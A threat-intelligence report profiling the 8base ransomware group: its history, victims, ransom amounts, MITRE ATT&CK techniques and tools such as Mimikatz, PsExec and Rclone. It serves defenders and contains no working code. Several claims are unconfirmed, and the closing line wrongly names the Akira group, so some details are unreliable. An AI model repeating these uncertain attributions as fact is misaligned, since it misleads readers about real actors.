Overview and Recent Claimed Attacks

The 8base ransomware group has emerged as one of the most active actors in the cyber extortion landscape, targeting organizations of various sizes and across multiple sectors. The group’s organizational structure appears to consist of a core team of developers and affiliates operating under a Ransomware-as-a-Service (RaaS) model, responsible for malware distribution and ransom negotiations.

 

Recently, 8base has claimed attacks against companies in critical sectors — including healthcare, industrial, and public — and, in some cases, has published data fragments as proof of intrusion. Double extortion techniques (encryption + threat of data publication) remain a constant in their operations.

 

Group History and Interactions with Other Ransomware Groups

The first documented appearance of 8base dates back to late 2021, according to OSINT analysis and cybercrime forum activity.
Some hypotheses suggest the presence of former affiliates from groups such as Conti or REvil, though there is no definitive confirmation.

 

Links to Other Groups

  • Possible code or technique inheritance from groups like Trickbot, based on similarities in certain encryption modules.
  • Shared Command & Control (C2) infrastructure with smaller gangs, observed via platforms such as Shodan and Censys.

 

Collaborations and Conflicts

  • Potential collaborations on the dark web, identified on XSS Forum and BreachForums.
  • Reports from affiliates of delayed payments, leading to internal disputes or spin-offs.

 

Notable Victims

  • Hospitals and private clinics in the United States and Europe.
  • Clinical data management companies and diagnostic laboratories.
  • Mechanical and automotive companies in Germany and France.
  • Electronic component manufacturers in Asia.
  • Municipal entities in Italy and local authorities in Spain.
  • Minor government agencies in the United States.
  • Legal consulting firms and digital marketing agencies.
  • Small and medium-sized IT enterprises.

 

Financial Data and Ransom Demands

  • Ransom Amounts:
    • Average ransoms: USD 200,000 – 500,000 in cryptocurrency.
    • Maximum known ransom: up to USD 2 million.
  • Currencies Used:
    • Primarily Bitcoin (BTC); occasionally Monero (XMR) for enhanced anonymity.
  • Negotiation Strategies:
    • Double Extortion: data encryption + threat of publication.
    • Direct contact with victims through dedicated sites or encrypted chat channels.
  • Estimated Total Revenue:
    • Estimates range between USD 5 million and 10 million, not officially confirmed.

 

Techniques Used

  1. Spear Phishing
    • Sending emails with malicious attachments or links to phishing pages.
    • MITRE ATT&CK: T1566
  2. Exploitation of RDP or VPN Vulnerabilities
    • Exploiting misconfigurations or known flaws in exposed services.
    • MITRE ATT&CK: T1190

Execution and Propagation Techniques

  1. PowerShell Scripting
    • Executing scripts to download and deploy payloads across networked machines.
    • MITRE ATT&CK: T1059.001
  2. Abuse of Remote Administration Tools
    • Using PsExec or WMI for lateral movement within the network.
    • MITRE ATT&CK: T1047

Persistence Techniques

  1. Autostart Services and Registry Keys
    • Creating services or editing Windows Registry entries to ensure persistence.
    • MITRE ATT&CK: T1547
  2. Compromised Local Accounts
    • Creating or leveraging privileged accounts to maintain access.
    • MITRE ATT&CK: T1078

Data Exfiltration and Destruction Techniques

  1. Data Transfer to Third-Party Servers
    • Using SFTP or custom scripts to exfiltrate data.
    • MITRE ATT&CK: T1041
  2. Encryption and Deletion of Backups
    • Removing or disabling backup solutions prior to final encryption.
    • MITRE ATT&CK: T1486

 

Tools Used

  • Remcos RAT: Used for remote control of compromised machines.
  • NanoCore: Occasionally observed as a secondary payload.

Encryption Malware and Ransomware Payloads

  • 8base Payload: Custom variant, often obfuscated with proprietary packers.
  • Possible Babuk Derivative: Code similarities noted, but unconfirmed.

Lateral Movement Tools

  • PsExec: For executing commands and deploying ransomware.
  • Mimikatz: For obtaining plaintext credentials (pass-the-hash, pass-the-ticket).

Data Exfiltration Tools

  • Rclone: Used to upload data to cloud storage services.
  • Wget/PowerShell Scripts: For unauthorized file transfers.

Living-off-the-Land Binaries (LoLBins)

  • PowerShell: For in-memory execution of malicious scripts to avoid detection.
  • WMIC: For executing remote commands on Windows hosts.

 

Geographic Trends

Country Most Affected Sectors Notes
United States Healthcare, Public Sector Critical infrastructure and high-value healthcare databases.
Italy Public Sector, SMEs Multiple municipalities targeted, lacking timely patching.

 

Law Enforcement Actions

  • Documented International Operations: Europol and the FBI have conducted inspections of suspect hosting providers, per official bulletins.
  • Confirmed Arrests: No direct arrests of 8base members have been reported to date.
  • Infrastructure and Wallet Seizures: No public reports of wallet or C2 server seizures directly linked to 8base.
  • Official Statements from Authorities: Some CISA and FBI IC3 reports reference ransomware threats in general, without specific mention of 8base.

Source Transparency

Source Reliability Original Language Publication Date
Shodan High English 2023-06-15
AlienVault OTX Medium English 2023-07-01
Europol High English 2023-05-20
DarkFeed.io Medium English 2023-07-05
VX Underground Medium English 2023-06-28
MITRE ATT&CK High English 2023-06-10
Krebs on Security Medium English 2023-06-25
Reddit r/cybersecurity Low English 2023-07-01

 


Note: the information in this report is sourced from materials of varying reliability and may evolve over time. We will update regularly to provide the most accurate view of the akira ransomware group’s activities.